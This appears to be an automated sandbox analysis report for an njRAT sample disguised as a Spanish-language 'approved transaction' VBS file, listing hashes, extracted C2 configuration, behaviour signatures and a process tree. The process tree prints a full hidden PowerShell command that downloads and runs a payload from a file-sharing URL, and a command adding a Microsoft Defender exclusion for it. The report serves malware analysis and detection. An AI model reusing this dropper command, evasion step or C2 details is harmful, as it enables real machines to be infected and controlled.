njrat | 4df37056407ca0353e2357399ec8f2bd7583b6d10fc5d1d4f6744b9415a1ce2f

General

Target

Transaccion Aprobada.vbs
Size

1KB
MD5

45beeab3735b33386dc605d813ab1712
SHA1

9570171eb0875939b3a9fd51710422036ca968a7
SHA256

4df37056407ca0353e2357399ec8f2bd7583b6d10fc5d1d4f6744b9415a1ce2f
SHA512

3b7077d939301d4708a8d41d27bfe0df8e4d703d07af8882e14b02b65dfde303b13f2a428c2911fe3d1eb086e05199bb791562e490ac28092fbd6f520102335e

Score

10^/10

njrat nyan cat suricata trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://onedrive.live.com/download?cid=4DBCDBEA8A120146&resid=4DBCDBEA8A120146%21130&authkey=AEqY-yNYbKJY9pM

Extracted

Family

njrat

Version

0.7NC

Botnet

NYAN CAT

C2

reald27.duckdns.org:3525

Mutex

d58e514d83d54f2c

Attributes

reg_key
d58e514d83d54f2c
splitter
@!#&^%$

Signatures

njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat
suricata: ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)
suricata: ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)
suricata
Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

7 1996 powershell.exe
9 1996 powershell.exe
Downloads MZ/PE file
Executes dropped EXE 2 IoCs

Processes:

Hostdyn.exeHostdyn.exe

pid process

1436 Hostdyn.exe
1112 Hostdyn.exe

flow	pid	process
7	1996	powershell.exe
9	1996	powershell.exe

pid	process
1436	Hostdyn.exe
1112	Hostdyn.exe

Drops startup file 2 IoCs

Processes:

WScript.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Transaccion Aprobada.vbs	WScript.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Transaccion Aprobada.vbs	WScript.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

Hostdyn.exe

description pid process target process

PID 1436 set thread context of 1112 1436 Hostdyn.exe Hostdyn.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exepowershell.exe

pid process

1996 powershell.exe
1996 powershell.exe
1104 powershell.exe
1104 powershell.exe

description	pid	process	target process
PID 1436 set thread context of 1112	1436	Hostdyn.exe	Hostdyn.exe

pid	process
1996	powershell.exe
1996	powershell.exe
1104	powershell.exe
1104	powershell.exe

Suspicious use of AdjustPrivilegeToken 21 IoCs

Processes:

powershell.exepowershell.exeHostdyn.exe

description	pid	process
Token: SeDebugPrivilege	1996	powershell.exe
Token: SeDebugPrivilege	1104	powershell.exe
Token: SeDebugPrivilege	1112	Hostdyn.exe
Token: 33	1112	Hostdyn.exe
Token: SeIncBasePriorityPrivilege	1112	Hostdyn.exe
Token: 33	1112	Hostdyn.exe
Token: SeIncBasePriorityPrivilege	1112	Hostdyn.exe
Token: 33	1112	Hostdyn.exe
Token: SeIncBasePriorityPrivilege	1112	Hostdyn.exe
Token: 33	1112	Hostdyn.exe
Token: SeIncBasePriorityPrivilege	1112	Hostdyn.exe
Token: 33	1112	Hostdyn.exe
Token: SeIncBasePriorityPrivilege	1112	Hostdyn.exe
Token: 33	1112	Hostdyn.exe
Token: SeIncBasePriorityPrivilege	1112	Hostdyn.exe
Token: 33	1112	Hostdyn.exe
Token: SeIncBasePriorityPrivilege	1112	Hostdyn.exe
Token: 33	1112	Hostdyn.exe
Token: SeIncBasePriorityPrivilege	1112	Hostdyn.exe
Token: 33	1112	Hostdyn.exe
Token: SeIncBasePriorityPrivilege	1112	Hostdyn.exe

Suspicious use of WriteProcessMemory 20 IoCs

Processes:

WScript.exepowershell.exeHostdyn.exe

description	pid	process	target process
PID 1824 wrote to memory of 1996	1824	WScript.exe	powershell.exe
PID 1824 wrote to memory of 1996	1824	WScript.exe	powershell.exe
PID 1824 wrote to memory of 1996	1824	WScript.exe	powershell.exe
PID 1996 wrote to memory of 1436	1996	powershell.exe	Hostdyn.exe
PID 1996 wrote to memory of 1436	1996	powershell.exe	Hostdyn.exe
PID 1996 wrote to memory of 1436	1996	powershell.exe	Hostdyn.exe
PID 1996 wrote to memory of 1436	1996	powershell.exe	Hostdyn.exe
PID 1436 wrote to memory of 1104	1436	Hostdyn.exe	powershell.exe
PID 1436 wrote to memory of 1104	1436	Hostdyn.exe	powershell.exe
PID 1436 wrote to memory of 1104	1436	Hostdyn.exe	powershell.exe
PID 1436 wrote to memory of 1104	1436	Hostdyn.exe	powershell.exe
PID 1436 wrote to memory of 1112	1436	Hostdyn.exe	Hostdyn.exe
PID 1436 wrote to memory of 1112	1436	Hostdyn.exe	Hostdyn.exe
PID 1436 wrote to memory of 1112	1436	Hostdyn.exe	Hostdyn.exe
PID 1436 wrote to memory of 1112	1436	Hostdyn.exe	Hostdyn.exe
PID 1436 wrote to memory of 1112	1436	Hostdyn.exe	Hostdyn.exe
PID 1436 wrote to memory of 1112	1436	Hostdyn.exe	Hostdyn.exe
PID 1436 wrote to memory of 1112	1436	Hostdyn.exe	Hostdyn.exe
PID 1436 wrote to memory of 1112	1436	Hostdyn.exe	Hostdyn.exe
PID 1436 wrote to memory of 1112	1436	Hostdyn.exe	Hostdyn.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Transaccion Aprobada.vbs"
1⤵
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:1824

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Executionpolicy bypass -noprofile -windowstyle hidden -command "Set-Content -value (new-object System.net.webclient).downloaddata( 'https://onedrive.live.com/download?cid=4DBCDBEA8A120146&resid=4DBCDBEA8A120146%21130&authkey=AEqY-yNYbKJY9pM' ) -encoding byte -Path $env:appdata\Hostdyn.exe; Start-Process $env:appdata\Hostdyn.exe"
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1996

C:\Users\Admin\AppData\Roaming\Hostdyn.exe
"C:\Users\Admin\AppData\Roaming\Hostdyn.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1436

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Hostdyn.exe"
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1104

C:\Users\Admin\AppData\Roaming\Hostdyn.exe
"C:\Users\Admin\AppData\Roaming\Hostdyn.exe"
4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1112

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
MD5
0d437d1d3d179983e2d14134b463680c

SHA1
dbf17fba42622db4e9288f2a2cb6b319c27c17bc

SHA256
1fcbcc1b4817031ceb152e10138370e9c6b8a63530a9eb9f019910b21cc0a390

SHA512
5b34025f5d6858c62bc98c2adf51fc2d57fd7b07fe0805c1f506f4a0c8065ea44a556c26b15fc938d38ca97bba5360e9575fc7159469f64f630079823afaffd9

Download Submit
C:\Users\Admin\AppData\Roaming\Hostdyn.exe
MD5
c0f47cefd86e4f7001fc2ddb8f3e0c5d

SHA1
2b0fc1b8bad1b638a1798ada05e5c47c5c920cff

SHA256
30657f9922b3a20543bd4de8638cbdba793bcda6ad307e61f3227dce43b705d0

SHA512
55fa81a60bc5db3640cdfd59efcc2ee4d1545462af80722f9eec930ba4223c86a052d921ecf2496f35583801864d75f379a4766718b1ccc114ea95b4d68dc9f0

Download Submit
C:\Users\Admin\AppData\Roaming\Hostdyn.exe
MD5
c0f47cefd86e4f7001fc2ddb8f3e0c5d

SHA1
2b0fc1b8bad1b638a1798ada05e5c47c5c920cff

SHA256
30657f9922b3a20543bd4de8638cbdba793bcda6ad307e61f3227dce43b705d0

SHA512
55fa81a60bc5db3640cdfd59efcc2ee4d1545462af80722f9eec930ba4223c86a052d921ecf2496f35583801864d75f379a4766718b1ccc114ea95b4d68dc9f0

Download Submit
C:\Users\Admin\AppData\Roaming\Hostdyn.exe
MD5
c0f47cefd86e4f7001fc2ddb8f3e0c5d

SHA1
2b0fc1b8bad1b638a1798ada05e5c47c5c920cff

SHA256
30657f9922b3a20543bd4de8638cbdba793bcda6ad307e61f3227dce43b705d0

SHA512
55fa81a60bc5db3640cdfd59efcc2ee4d1545462af80722f9eec930ba4223c86a052d921ecf2496f35583801864d75f379a4766718b1ccc114ea95b4d68dc9f0

Download Submit
memory/1104-92-0x0000000004850000-0x0000000004851000-memory.dmp

Filesize
4KB

Download
memory/1104-88-0x00000000048C0000-0x00000000048C1000-memory.dmp

Filesize
4KB

Download
memory/1104-103-0x0000000006230000-0x0000000006231000-memory.dmp

Filesize
4KB

Download
memory/1104-101-0x000000007EF30000-0x000000007EF31000-memory.dmp

Filesize
4KB

Download
memory/1104-110-0x0000000006300000-0x0000000006301000-memory.dmp

Filesize
4KB

Download
memory/1104-84-0x0000000075801000-0x0000000075803000-memory.dmp

Filesize
8KB

Download
memory/1104-102-0x00000000060F0000-0x00000000060F1000-memory.dmp

Filesize
4KB

Download
memory/1104-96-0x0000000006080000-0x0000000006081000-memory.dmp

Filesize
4KB

Download
memory/1104-125-0x0000000006380000-0x0000000006381000-memory.dmp

Filesize
4KB

Download
memory/1104-91-0x00000000046C0000-0x00000000046C1000-memory.dmp

Filesize
4KB

Download
memory/1104-111-0x0000000006000000-0x0000000006001000-memory.dmp

Filesize
4KB

Download
memory/1104-89-0x0000000004880000-0x0000000004881000-memory.dmp

Filesize
4KB

Download
memory/1104-90-0x0000000004882000-0x0000000004883000-memory.dmp

Filesize
4KB

Download
memory/1104-87-0x0000000002330000-0x0000000002331000-memory.dmp

Filesize
4KB

Download
memory/1104-80-0x0000000000000000-mapping.dmp

Download
memory/1104-126-0x0000000006390000-0x0000000006391000-memory.dmp

Filesize
4KB

Download
memory/1112-82-0x000000000040677E-mapping.dmp

Download
memory/1112-81-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/1112-127-0x0000000004970000-0x0000000004971000-memory.dmp

Filesize
4KB

Download
memory/1112-85-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/1436-71-0x0000000000000000-mapping.dmp

Download
memory/1436-79-0x0000000000420000-0x000000000042A000-memory.dmp

Filesize
40KB

Download
memory/1436-78-0x0000000000C00000-0x0000000000C3F000-memory.dmp

Filesize
252KB

Download
memory/1436-77-0x00000000003F0000-0x0000000000406000-memory.dmp

Filesize
88KB

Download
memory/1436-74-0x0000000000C50000-0x0000000000C51000-memory.dmp

Filesize
4KB

Download
memory/1436-76-0x0000000005050000-0x0000000005051000-memory.dmp

Filesize
4KB

Download
memory/1824-60-0x000007FEFB631000-0x000007FEFB633000-memory.dmp

Filesize
8KB

Download
memory/1996-68-0x0000000002060000-0x0000000002061000-memory.dmp

Filesize
4KB

Download
memory/1996-61-0x0000000000000000-mapping.dmp

Download
memory/1996-63-0x0000000002020000-0x0000000002021000-memory.dmp

Filesize
4KB

Download
memory/1996-64-0x000000001AAE0000-0x000000001AAE1000-memory.dmp

Filesize
4KB

Download
memory/1996-66-0x000000001AA64000-0x000000001AA66000-memory.dmp

Filesize
8KB

Download
memory/1996-67-0x00000000024E0000-0x00000000024E1000-memory.dmp

Filesize
4KB

Download
memory/1996-65-0x000000001AA60000-0x000000001AA62000-memory.dmp

Filesize
8KB

Download
memory/1996-70-0x000000001C240000-0x000000001C241000-memory.dmp

Filesize
4KB

Download
memory/1996-69-0x000000001B6F0000-0x000000001B6F1000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads